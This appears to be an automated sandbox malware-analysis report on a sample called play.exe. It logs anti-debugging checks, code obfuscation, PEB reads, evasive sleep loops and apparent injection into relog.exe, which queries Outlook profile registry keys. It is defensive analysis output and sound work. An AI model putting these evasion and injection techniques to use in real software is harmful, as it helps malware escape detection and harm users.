Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: play.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\play.exe

0_2_00BE90CB

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB7150 push esp; retf	0_2_00BB71BF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB9AC0 push esp; ret	0_2_00BB9AC1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB6A13 push ds; iretd	0_2_00BB6A20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA6BC7 push B2A749EEh; iretd	0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA6B6E push B2A749EEh; iretd	0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BADB4C push edx; iretd	0_2_00BADB4D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB6CA3 push ebp; retn A5BAh	0_2_00BB6D89
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA8DDA pushfd ; retf	0_2_00BA8E23
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE8505 push ecx; ret	0_2_00BE8518
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA3D70 push eax; ret	0_2_00BA3D72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2687 push eax; ret	0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB3EE3 push FFFFFFD3h; ret	0_2_00BB3FC3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA26D1 push eax; ret	0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB4E7C push ecx; ret	0_2_00BB4E83
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA272B push eax; ret	0_2_00BA2736
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB4F7E push ebp; iretd	0_2_00BB4F82
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA276E push eax; ret	0_2_00BA2776
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266225F pushad ; ret	0_2_026627F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026627FA pushad ; ret	0_2_026627F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266283D push eax; iretd	0_2_02662858
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD push ecx; mov dword ptr [esp], ecx	0_2_026909B6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266135F push eax; iretd	0_2_02661369
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03978BAC push esp; retf	4_2_03978C1B
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03977BCD push 0B2B29DEh; ret	4_2_03977BD2
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03969B0C push 9D5CB4DDh; retf	4_2_03969B16
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03969A00 push esp; retf	4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039699FB push esp; retf	4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0396A836 pushfd ; retf	4_2_0396A87F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039786FF push ebp; retn A5BAh	4_2_039787E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03968623 push B2A749EEh; iretd	4_2_0396862A
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03977D81 push eax; ret	4_2_03977D82

Source: play.exe

Static PE information: section name: .text entropy: 7.973595489277393

Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_026D096E rdtsc

0_2_026D096E

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 3936			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 6035			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\play.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\relog.exe	API coverage: 2.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep count: 3936 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep time: -7872000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep count: 6035 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep time: -12070000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -38000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\relog.exe

Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose,

5_2_008CC700

Source: relog.exe, 00000005.00000002.4103860914.0000000002C71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|'[Q7
Source: aAqvujXSGNo.exe, 00000006.00000002.4104075019.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: firefox.exe, 00000007.00000002.2356033247.000001917377C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\play.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\play.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_026D096E rdtsc

0_2_026D096E

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BB8373 LdrLoadDll,

0_2_00BB8373

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00BE70C8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\play.exe

0_2_00BE90CB

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268826B mov eax, dword ptr fs:[00000030h]	0_2_0268826B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h]	0_2_0274A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h]	0_2_0274A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276625D mov eax, dword ptr fs:[00000030h]	0_2_0276625D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696259 mov eax, dword ptr fs:[00000030h]	0_2_02696259
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02718243 mov eax, dword ptr fs:[00000030h]	0_2_02718243
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02718243 mov ecx, dword ptr fs:[00000030h]	0_2_02718243
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A250 mov eax, dword ptr fs:[00000030h]	0_2_0268A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268823B mov eax, dword ptr fs:[00000030h]	0_2_0268823B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027662D6 mov eax, dword ptr fs:[00000030h]	0_2_027662D6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h]	0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h]	0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov ecx, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h]	0_2_026CE284
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h]	0_2_026CE284
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273437C mov eax, dword ptr fs:[00000030h]	0_2_0273437C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02738350 mov ecx, dword ptr fs:[00000030h]	0_2_02738350
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A352 mov eax, dword ptr fs:[00000030h]	0_2_0275A352
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov ecx, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276634F mov eax, dword ptr fs:[00000030h]	0_2_0276634F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov ecx, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C310 mov ecx, dword ptr fs:[00000030h]	0_2_0268C310
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0310 mov ecx, dword ptr fs:[00000030h]	0_2_026B0310
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C63FF mov eax, dword ptr fs:[00000030h]	0_2_026C63FF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h]	0_2_027343D4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h]	0_2_027343D4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov ecx, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027163C0 mov eax, dword ptr fs:[00000030h]	0_2_027163C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C3CD mov eax, dword ptr fs:[00000030h]	0_2_0274C3CD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h]	0_2_026B438F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h]	0_2_026B438F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688397 mov eax, dword ptr fs:[00000030h]	0_2_02688397
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BC073 mov eax, dword ptr fs:[00000030h]	0_2_026BC073
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716050 mov eax, dword ptr fs:[00000030h]	0_2_02716050
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692050 mov eax, dword ptr fs:[00000030h]	0_2_02692050
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726030 mov eax, dword ptr fs:[00000030h]	0_2_02726030
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A020 mov eax, dword ptr fs:[00000030h]	0_2_0268A020
